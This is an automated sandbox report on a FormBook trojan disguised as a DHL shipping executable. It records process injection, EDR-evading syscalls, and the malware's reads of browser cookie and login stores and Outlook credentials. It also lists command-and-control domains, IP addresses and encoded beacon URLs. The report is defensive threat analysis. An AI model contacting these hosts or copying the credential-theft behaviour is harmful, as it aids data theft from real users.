            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_00807CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00807CAF
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0080874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0080874B
            Source: DHL 40312052024.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000000.2120674994.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000002.4473052387.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473116151.0000000000FF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: DHL 40312052024.exe, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000000.2120674994.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000002.4473052387.0000000000FC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000000.2120674994.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000002.4473052387.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473116151.0000000000FF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000000.2120674994.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000002.4473052387.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473116151.0000000000FF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007D862B cpuid 0_2_007D862B
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007E4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_007E4E87
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007F1E06 GetUserNameW,0_2_007F1E06
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007E3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_007E3F3A
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007B49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007B49A0

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4473466571.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4473431930.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4475242478.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4473348288.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2202258982.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2202388210.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: DHL 40312052024.exeBinary or memory string: WIN_81
            Source: DHL 40312052024.exeBinary or memory string: WIN_XP
            Source: DHL 40312052024.exeBinary or memory string: WIN_XPe
            Source: DHL 40312052024.exeBinary or memory string: WIN_VISTA
            Source: DHL 40312052024.exeBinary or memory string: WIN_7
            Source: DHL 40312052024.exeBinary or memory string: WIN_8
            Source: DHL 40312052024.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4473466571.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4473431930.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4475242478.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4473348288.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2202258982.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2202388210.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_00826283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00826283
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_00826747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00826747

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		2
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570503 Sample: DHL 40312052024.exe Startdate: 07/12/2024 Architecture: WINDOWS Score: 100 28 www.joyesi.xyz 2->28 30 www.techchains.info 2->30 32 15 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 50 6 other signatures 2->50 10 DHL 40312052024.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 oYzsgiLOOTqCTABCCGZlOCaAgG.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 oYzsgiLOOTqCTABCCGZlOCaAgG.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.rssnewscast.com 91.195.240.94, 49984, 49985, 49986 SEDO-ASDE Germany 22->34 36 elettrosistemista.zip 195.110.124.133, 49992, 49993, 49994 REGISTER-ASIT Italy 22->36 38 5 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            DHL 40312052024.exe47%ReversingLabsWin32.Trojan.AutoitInject
            DHL 40312052024.exe42%VirustotalBrowse
            DHL 40312052024.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.elettrosistemista.zip/fo8o/?k0=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==&hh=cJ5D4t7Hz6GD3fB100%Avira URL Cloudmalware
            http://www.goldenjade-travel.com/fo8o/?k0=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==&hh=cJ5D4t7Hz6GD3fB100%Avira URL Cloudmalware
            https://www.empowermedeco.com/fo8o/?k0=mxnR0%Avira URL Cloudsafe
            http://www.magmadokum.com/fo8o/?k0=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==&hh=cJ5D4t7Hz6GD3fB0%Avira URL Cloudsafe
            http://www.3xfootball.com/fo8o/?k0=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==&hh=cJ5D4t7Hz6GD3fB0%Avira URL Cloudsafe
            http://www.empowermedeco.com/fo8o/?k0=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&hh=cJ5D4t7Hz6GD3fB0%Avira URL Cloudsafe
            http://www.rssnewscast.com/fo8o/?k0=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&hh=cJ5D4t7Hz6GD3fB100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            elettrosistemista.zip
            		195.110.124.133
            		truefalse
              		high
              empowermedeco.com
              		217.196.55.202
              		truefalse
                		high
                www.3xfootball.com
                		154.215.72.110
                		truefalse
                  		high
                  www.goldenjade-travel.com
                  		116.50.37.244
                  		truefalse
                    		high
                    www.rssnewscast.com
                    		91.195.240.94
                    		truefalse
                      		high
                      www.techchains.info
                      		66.29.149.46
                      		truefalse
                        		high
                        natroredirect.natrocdn.com
                        		85.159.66.93
                        		truefalse
                          		high
                          www.magmadokum.com
                          		unknown
                          		unknownfalse
                            		high
                            www.donnavariedades.com
                            		unknown
                            		unknownfalse
                              		high
                              www.660danm.top
                              		unknown
                              		unknownfalse
                                		high
                                www.joyesi.xyz
                                		unknown
                                		unknownfalse
                                  		high
                                  www.liangyuen528.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    www.kasegitai.tokyo
                                    		unknown
                                    		unknownfalse
                                      		high
                                      www.empowermedeco.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        www.elettrosistemista.zip
                                        		unknown
                                        		unknownfalse
                                          		high
                                          www.antonio-vivaldi.mobi
                                          		unknown
                                          		unknownfalse
                                            		high

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.empowermedeco.com/fo8o/false
                                              		high
                                              http://www.elettrosistemista.zip/fo8o/?k0=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==&hh=cJ5D4t7Hz6GD3fBtrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.goldenjade-travel.com/fo8o/?k0=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==&hh=cJ5D4t7Hz6GD3fBtrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.elettrosistemista.zip/fo8o/false
                                                		high
                                                http://www.magmadokum.com/fo8o/false
                                                  		high
                                                  http://www.rssnewscast.com/fo8o/false
                                                    		high
                                                    http://www.3xfootball.com/fo8o/?k0=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==&hh=cJ5D4t7Hz6GD3fBtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.magmadokum.com/fo8o/?k0=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==&hh=cJ5D4t7Hz6GD3fBtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.rssnewscast.com/fo8o/?k0=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&hh=cJ5D4t7Hz6GD3fBtrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.empowermedeco.com/fo8o/?k0=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&hh=cJ5D4t7Hz6GD3fBtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.goldenjade-travel.com/fo8o/false
                                                      		high
                                                      http://www.techchains.info/fo8o/false
                                                        		high

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/ac/?q=netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.empowermedeco.com/fo8o/?k0=mxnRnetbtugc.exe, 00000004.00000002.4474120065.000000000496A000.00000004.10000000.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.0000000003F6A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.empowermedeco.comoYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4475242478.0000000004ECC000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.ecosia.org/newtab/netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_netbtugc.exe, 00000004.00000002.4474120065.0000000003FFE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4475817977.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.00000000035FE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.sedo.com/services/parking.php3oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.00000000035FE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://codepen.io/uzcho_/pens/popular/?grid_type=listnetbtugc.exe, 00000004.00000002.4474120065.0000000004322000.00000004.10000000.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.0000000003922000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://codepen.io/uzcho_/pen/eYdmdXw.cssnetbtugc.exe, 00000004.00000002.4474120065.0000000004322000.00000004.10000000.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.0000000003922000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  91.195.240.94
                                                                                  		www.rssnewscast.comGermany
                                                                                  		47846SEDO-ASDEfalse
                                                                                  154.215.72.110
                                                                                  		www.3xfootball.comSeychelles
                                                                                  		132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                                  195.110.124.133
                                                                                  		elettrosistemista.zipItaly
                                                                                  		39729REGISTER-ASITfalse
                                                                                  116.50.37.244
                                                                                  		www.goldenjade-travel.comTaiwan; Republic of China (ROC)
                                                                                  		18046DONGFONG-TWDongFongTechnologyCoLtdTWfalse
                                                                                  85.159.66.93
                                                                                  		natroredirect.natrocdn.comTurkey
                                                                                  		34619CIZGITRfalse
                                                                                  66.29.149.46
                                                                                  		www.techchains.infoUnited States
                                                                                  		19538ADVANTAGECOMUSfalse
                                                                                  217.196.55.202
                                                                                  		empowermedeco.comNorway
                                                                                  		29300AS-DIRECTCONNECTNOfalse

                                                                                  General Information

                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1570503
                                                                                  Start date and time:2024-12-07 06:59:08 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 10m 3s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:7
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:2
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:DHL 40312052024.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/3@15/7
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 66.7%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 98%
                                                                                  • Number of executed functions: 50
                                                                                  • Number of non-executed functions: 272
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Execution Graph export aborted for target oYzsgiLOOTqCTABCCGZlOCaAgG.exe, PID 1852 because it is empty
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  01:00:51API Interceptor9424311x Sleep call for process: netbtugc.exe modified

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  91.195.240.94DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  154.215.72.110wOoESPII08.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
                                                                                  N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
                                                                                  Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  www.3xfootball.comDHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
